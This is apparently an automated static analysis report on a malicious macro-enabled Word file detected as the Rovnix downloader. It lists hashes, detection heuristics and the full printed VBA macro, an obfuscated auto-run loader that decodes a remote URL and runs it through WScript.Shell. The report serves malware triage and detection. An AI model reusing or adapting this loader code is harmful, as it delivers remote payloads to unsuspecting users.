Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fee25e7d024107c8…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 64.7 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-01
MD5: 4fd9ccd0bd6e296a356d5e4ed06eec4f
SHA-1: 133af28ead4b2ef10f05f4cf8aaedb819a0b1bc1
SHA-256: fee25e7d024107c867f4ddbb61756bb02e935a8802813f5d8677b3ecc282759d
Risk score: 292

Heuristics (8)

  • ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
      Application.Run "GNjKRAFwHEjLiU"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     CreateObject(xfUqIIdDLUKgHEwy).Run cGFYngIEIWRdArbDpT, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 15 extracted URLs were found in document text (OOXML body / shared strings); none was reached from a macro, script or link annotation:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9317 bytes
SHA-256: 708c553e4202d5a83f462c7ec10f93bd01c88b214b9ab662eb739a5f2e3f5b21
Detection
ClamAV: No threats found
Obfuscation or payload: likely
250 of 301 identifiers look randomly generated (e.g. 'xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VQBdgVxJKqkfEC()
  BxOoBxwVyKFg = "dZ" + "byLKwgMYnRKqqScIPcPJCP" + "UOFOLziqcvNSuYBKr"
ydTknTgvZjPY = 798 - 1801
RooFRuCbx = "FnVIkpHNJVDIcyBpZzQgGoyjy" + "DBkjFTFFHVEbprCbGqoEnEiZn" + "kvonpPIwWzFx"
zvYBAMSW = 1609 + 384 + 1975 + 686
zADcwOM = "MFCOJULNxUxGiwCUHK" + "K" + LTrim("JjgFnuMJDyiPHcguUuSfw") + "CIYppwuQffqYZz"
  Application.Run "GNjKRAFwHEjLiU"
  yyuPKUxX = 399 + 188 + 1214 + 1657 + 385 + 451
zBEECqk = 6 + 380 + 1026 + 1780 + 1416 + 1145
nRKdKybpZi = 1470 + 348 + 1205 + 1409 + 515 + 1763 + 1586
dIFJzXGVOSr = "KYEPzOUgWfQRKcB" + "IwjNBuv"
MEXHIrM = LTrim("EKFyR") + "CAPPFErdAxkNiFkfinDbwTUSuKDyWn"
End Sub
Sub GrzDwuZfpdTfAw()
  IzPyJJBrz = 913 + 1949 + 417
CbYYZbDJ = "HBZCpkvEiCj" + LTrim("PJ") + LTrim("kfRSFUOOwizDd") + "JXvyFnDMQurpRvVRGVdPFiYZMFxQ"
oGcDopqjHkxK = RTrim("TPGSgjg") + "IX" + "UbQCkwFbvALWrU" + LTrim("ENZLjQnNcHdDVCggYuqgYyb") + "vpfqKcjpbJZTRgUXdd"
HLWYWLkzYfdO = 721 + 1375 + 251 + 1903 + 574
  Application.Run "VPXEyEUduVNbZxHIu"
  FqwLVGw = "VuRrBi" + "NVWcwOWNMARZbRHzZnMgTBiJ" + LTrim("Jzqi") + RTrim("fCQJkoQSXyzWkvjcbUWOoypj") + RTrim("fjRUKHEWCyJcPwiRoSBwcLHoZ")
UxqkfiQQpT = RTrim("WxJBLMfiMKbXSjfIBLvxw") + RTrim("nqCXJJPSYHbxkMWXNfNyGuicoBxO") + LTrim("oDMnZdNgAWBBDNHHKEyvUVEbJZ")
CvVIdUQxWV = 1290 + 1830 + 209
RbOXOQTG = 481 + 1690 + 1507 + 705
End Sub

Sub VPXEyEUduVNbZxHIu()
 NKIAnYqANjwB = 442 - 287 - 959
OOcQBxBTDpO = 1999 + 1623 + 820 + 708 + 590
qbofCTQxiCA = 1901 - 1242 - 306 - 1645 - 1504 - 1310 - 1182
VYjCpTx = "zjrWkbQfUrRoEDfLGRQvZPLDqCXc" + LTrim("MdcduHPPJ") + "JLQMQV" + RTrim("gUYKwMyVBZTvKHvF") + RTrim("JFJoxiVwcxcKyIEoJOvJ")
XUkGOYjQkiNx = 690 + 982 + 1618 + 1744
XzpzjdNzQV = 1491 + 1128 + 158
 cGFYngIEIWRdArbDpT = "AgiZQyJATRyIpYIDNrJzjrEBhqJcqyMKpXZWXvXFnoYiynRkH hqJcqyMKpXZWXqJcqyMKpXZWXp://xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXFnoYiynRkHwd.coAgiZQyJATRyI/OU/pYIDNrJzjrEBqJcqyMKpXZWXxYzzoMyHicNNAgiZQyJATRyI.php?uqJcqyMKpXZWXAgiZQyJATRyIvXFnoYiynRkH=brvXFnoYiynRkHnddFSoNDpBBVRf"
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "AgiZQyJATRyI", "m")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "vXFnoYiynRkH", "a")
SyMPncHj = 622 - 868 - 1883 - 1095
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "pYIDNrJzjrEB", "s")
QOgiPHJ = RTrim("xiQZpbvKULD") + "kvAPLQbjTiO"
jyLFZuwqku = "dMVBPKGzMTNYqwHXBPTLNk" + "ncx" + LTrim("vVbPKrLcWJFIIdV")
bdRqKSjfpO = 1249 - 936 - 1997 - 830
DATEdKC = 333 + 41 + 1056 + 871 + 166
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "qJcqyMKpXZWX", "t")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "xYzzoMyHicNN", "e")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "dFSoNDpBBVRf", "l")
BEAOOdyO = 857 + 80 + 1634 + 1448 + 140
FrXqKjDcxw = 393 + 1811 + 571 + 1822 + 151
xfUqIIdDLUKgHEwy = "WScripRXDZvYcEvUHG.ShvdHSMTbMWqLwRRiLSNGGGfJwRRiLSNGGGfJw"
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "PivkBnPXEQpK", "m")
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "vBHYkuNSgTjk", "a")
rUFSNqoIXcpn = 1 - 765 - 426 - 1821 - 723 - 1342
xAjxfxWDLH = 1035 - 567 - 1126 - 953 - 1478 - 819
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "MqoRFCqGuSMq", "s")
PCnXSpSiGUJ = 105 + 411 + 1482 + 340 + 448 + 1203
IYSEGQDYc = RTrim("HfRpBp") + "YZgTADwgzIoKfkNjjCvIUyYMYr"
bnYJWVnKk = 1459 - 133 - 1758
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "RXDZvYcEvUHG", "t")
JDUHdoFEYDUP = RTrim("ZO") + LTrim("dWvQBGBbriTSIRxocxwIK") + "d" + "wSYngboyAijCWWgVKHWJqUXjRZb"
GvTQLfORPojR = 1859 + 1460 + 196 + 1685 + 1732
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "vdHSMTbMWqLw", "e")
TEqTpIW = 1750 - 39 - 264 - 1324 - 1554
GdEgfFgxf = 1049 + 241 + 1815 + 981
kNwOWvb = RTrim("D") + "HHGkGYkVbfIFciNdoTTWKBUgWL"
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "RRiLSNGGGfJw", "l")
 UHrRbEwuQ = RTrim("ffkIkdUgWCCHjwGSoinbXPbTNOdH") + "XniRifXoSxZpvUoCrZgcXEHEcSnZOP" + "KcTCwNVAkxwVZXPIjXqODuyfw" + RTrim("EFHDRqOZxZWxISxCGA") + LTrim("ARVKZpMZLOfzpNCcTbUArWONNw")
yrqEUPYXHAVS = 933 - 1015 - 1501 - 42
GFxUUgS = "uBgNCioRpjuAMOkFBJnJH" + "LKFgTOdVMbgFrKEZozJN" + LTrim("cIUyGZnQTxGvXXVZBACpBd")
BBUoPJYpJc = "SFPyXZzzZgXHNpRbwpYuGBWEINIun" + LTrim("rJuyPyqXLPgVxqXDK") + "WSGZZyZRnWRjyy" + RTrim("BOJCZXUG")
 CreateObject(xfUqIIdDLUKgHEwy).Run cGFYngIEIWRdArbDpT, 0
 vBDRXybpySSW = LTrim("KrdNMiTNKMQZvYApgxVLQVQd") + "FSNKWy" + LTrim("jRHNwkS") + "RDCxOZUWwEINSVKyWCCZTidivjSVFA" + RTrim("BoLHMAEJd")
jxYbijYHQn = 282 + 1121 + 1178 + 601 + 977 + 828
kKQpXVGj = "CEIck" + "cbkUZHCbGKWuLSobSnHdZwPNIyXVLV" + RTrim("OGBorrJNMSidOIywHAykbKIJkicvRn")
DqqOrgKSBcCg = 1326 + 1172 + 1748 + 421 + 745
OzLNUby = "UdHJyWfPowRXgLqqpNyrwULiLXfxW" + "uOKZE" + "SU" + RTrim("VIfgyRWrQHNjdDocKMGQHNF") + LTrim("PNoLkyxQSqN")
 ZZQMHMpWnc = "BGSNdIjXKBqQMnyjnxpwHjdoT" + LTrim("qUTyrTRgqKSFQZp") + "VduM"
CIdHdMbR = 1492 + 16 + 56
UDiQMrOYFfqT = 1586 - 812 - 1475 - 472 - 140
End Sub
Sub GNjKRAFwHEjLiU()
  KIAQrCXzc = 516 - 779 - 1338 - 466
kRYoEnizoMZ = 176 - 1920 - 531 - 1594
FQoSKXDLZbV = 1016 + 1469
  Application.Run "WpkQxiUjAVcrIM"
End Sub
Sub cupCkcZBNSnIKu()
  gJcPXzcMEwu = 887 + 1108 + 457 + 1738
pAqVKrYx = 322 - 937 - 1711 - 699 - 1643 - 1473 - 1806
kXFVTZZQ = RTrim("FiGrWddLCKGzujXBXpFuFkn") + RTrim("KBTDJBG") + "ZJEZSMTpuxrdiboHFBJypccH" + "OVEiZRHpUUon"
AFdJrQHwBrbV = "fWgZzgdSG" + "jQfxopwDyEfKPVgRWfQAXqXCB"
vNAnCnTUipW = 1354 - 1820 - 1009
  Application.Run "GrzDwuZfpdTfAw"
  zwUYBJfLCB = "kE" + RTrim("uPBrVXRcSYQb") + "bZCXAKIcfDZJvbLWZi"
rYCTUNXS = 1508 - 1085 - 59 - 1266
oWzpcArpg = 366 - 527 - 1120 - 639
VkwXWLyZzg = 17 + 944 + 531 + 832 + 1589 + 1731 + 876 + 829
IjAuwwvDIX = 1835 + 872 + 1943 + 103 + 94 + 1846 + 1976
TbCNDAB = RTrim("oKPzdp") + "UwwWHqZgTSogHMNquYOyX"
kgNfcOFA = LTrim("QpqBjOY") + "MXdYNyfxN" + "WwEocdywrUSHykubHP" + "bMvGOdVuuwcYFCwvRY" + "PvzrwKfKKFuBofrCWROfuUVivTDXz" + LTrim("zuOqMBWAqVqHnUHLg")
End Sub

Sub AutoClose()
  VTPQcTyZVFNk = RTrim("xnSxnSPVHqnMuSHVE") + "Yv" + LTrim("QnWbOTyZDTXLF")
MHVofYW = 1100 + 748 + 1707 + 1876 + 592
pPbTiBSgKjb = 523 + 1536
  Application.Run "RcjEwHjAWJGSoD"
  oOoPvIqDBYPM = LTrim("pYvPdxFZDFbznndCnFEkgvP") + "JQFDBkOSfcqCTUiJIKZcNS" + RTrim("CTQPSqXYEPRB") + "nRCFJiI" + "NOdZd" + RTrim("kBbKIcUVE")
PMRgGIg = LTrim("A") + "cGXKYIWJKHNJggddPpkMJIOXiucI" + RTrim("CD")
zZDcdZcokbQ = LTrim("xPRxV") + RTrim("TGYQQFQRiUAnGXxb") + "TjdzTpuZGrJMgFVF"
IxFudgHbL = 1019 - 1086 - 1137
GFYQzScvSQy = 1636 - 843 - 1455 - 1120 - 925 - 893
ZSExocYJ = "bZCFNUiOY" + RTrim("vTUAHUbfRjCiiTjGfNuSQb") + LTrim("fqxfUTVSGnHT")
vHGGUcVMR = RTrim("EYoERAJMyUTMJ") + "xnEzWBKgkIYBAgEMGUXFV" + RTrim("QnAfvMzgd") + LTrim("DcOACIGFBSZMcA")
End Sub
Sub RcjEwHjAWJGSoD()
  IMoguxPiNT = 1830 + 1034
rHHYdXVC = 1105 + 236 + 452 + 90
MpEUYFyHRLPH = 701 + 1198 + 1065 + 294 + 66 + 246 + 891 + 1741
DnSrSbznH = "xvDRdOS" + LTrim("UZLpEMTpVLD") + LTrim("XJTYG")
XpcwjbnYp = "OoxJSPn" + "QMCw" + "cPqxufIjNdbqzWq" + "NUzLpSAEjZfj"
  Application.Run "VQBdgVxJKqkfEC"
  GfvyBSLwfrP = 487 - 130 - 77
vgREHIyKFMPr = "IbBvWSKwQOMRM" + RTrim("PObYGLXPRwMCKYifJqG") + RTrim("pZozpbSZbHZYZRVkjpuYYZzozKW")
XHiwrujKi = RTrim("QyciJvMNKIcCoOiIgMGUNXBBVzxfYI") + "DnSLFQVCMQVHBucQPWbBgNfz" + RTrim("qQ") + LTrim("zfJqYMKWnvbTuSMKcFjxGvw") + LTrim("FEUxKTTIgVrDAxBBQBqDOWb")
LTSRnpPz = "B" + RTrim("vzYQgDd")
fvfDHvprTid = 1171 - 1432 - 786 - 381 - 803 - 1576 - 660 - 1954 - 795
End Sub

Sub WpkQxiUjAVcrIM()
  GxkJPOR = "ZGxQWbpDrfcKypSAiAoHSnu" + RTrim("vYKATIQkIHwYRNrzoycJY") + "TkCodC" + "KzARHWvuIG"
YdcquOFJN = "VJCLZInkNcQKYVUUcLDfPvvWEuxKkI" + "LikUDEVkFFxMPQwRKwbwkSgKOuRHzy" + RTrim("FjroD") + "YREfLYDGRuUMjkfISyfT" + RTrim("RQWuZknkAuiOUDpjD")
kIQXzSidwWI = 1849 - 895 - 690 - 633
wKkRUBbfWgH = LTrim("XRi") + RTrim("TGHLvrZ") + "VMuBDzq" + RTrim("QncxFogZb") + "PLZo" + "p"
IgoIBHY = LTrim("rWFiqwLLYUdZwk") + "qZMFPDuQPibIUIkBnkJrrEOHqVx" + RTrim("ZNdWDVQdxvydFIIqCSLEnIqn")
  Application.Run "RbRgYMGnLoRFMT"
  ASZVJUyPgDrP = LTrim("QTYrqpigdTkQjv") + RTrim("vJLLwZFqjGGfzOqnywHpQN") + LTrim("BWpKBqnzXUBuzUpnRTqzIV") + "IwNRfxbJVDbOkXFgBAZkUokW"
PEMyyWrCSdp = "VAGfizudRqdFWGETXBYSSE" + RTrim("dOIZKRXffYbNcDvZPrQDZJWuV") + RTrim("ZEPokAf") + LTrim("ApQA") + LTrim("xyEQ")
PNbfNyYbV = LTrim("EMUADiDXISUjBDvDgyMY") + "cOjiKAXxuuR" + "CffCkOJDHpgfXzARZIgRWLfKBYTAR"
IyqSWqYLdJ = 783 + 1525 + 1328 + 91
OQGIMRz = LTrim("pMxnWiMXYooqTdgVGp") + RTrim("AnQFRbNwBGxTfojoVQdYJJGpDHI") + "NjdNRCLfxMuXwzKJqLXZbgWyiQQJFv"
rGrJgQv = "ovgzpEUGTIgDGNXdwAjGK" + "CDbwqGIQYIAGfNMEGDjbVcYTcVW" + "nEiHDED"
End Sub
Sub RbRgYMGnLoRFMT()
  BGdWRTdzB = "nRqFCwNEOyUcRYuUbCiooXWQORPRB" + RTrim("iGHrborHnruAIywnOILMG") + "FxDQJGWGv"
zKSSiYyR = LTrim("G") + "nj" + "gnNRyvrbZrAzynz" + LTrim("MUNpQzcbCIKDGAoyAwOWWuVRxRNuJ") + RTrim("P")
  Application.Run "cupCkcZBNSnIKu"
  nJxAOKuUIy = "fMUcHPGJibuFJcTgJXzjdvMbzrX" + "TjkPKHbZfpKj" + "Tf"
LnMvdnw = 1062 - 201 - 634 - 638 - 921
yVPFzWqf = LTrim("XpvMgjQfPWbTRDG") + "HWTBJncrRMY" + RTrim("BzUXpFDjInqCFWTrETFxCGcgWkEwQp") + "UXjnLQVnOEECKUxGD"
cJLLYrPPSCFA = 1056 - 1760 - 64
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 29184 bytes
SHA-256: 90bebea237984cfe8ebbcc4c23692241b601c3fd7f1cc045f68893fd62f05cdc
Detection
ClamAV: Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload: likely
647 of 836 identifiers look randomly generated (e.g. 'xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXF') — consistent with name-mangling obfuscation.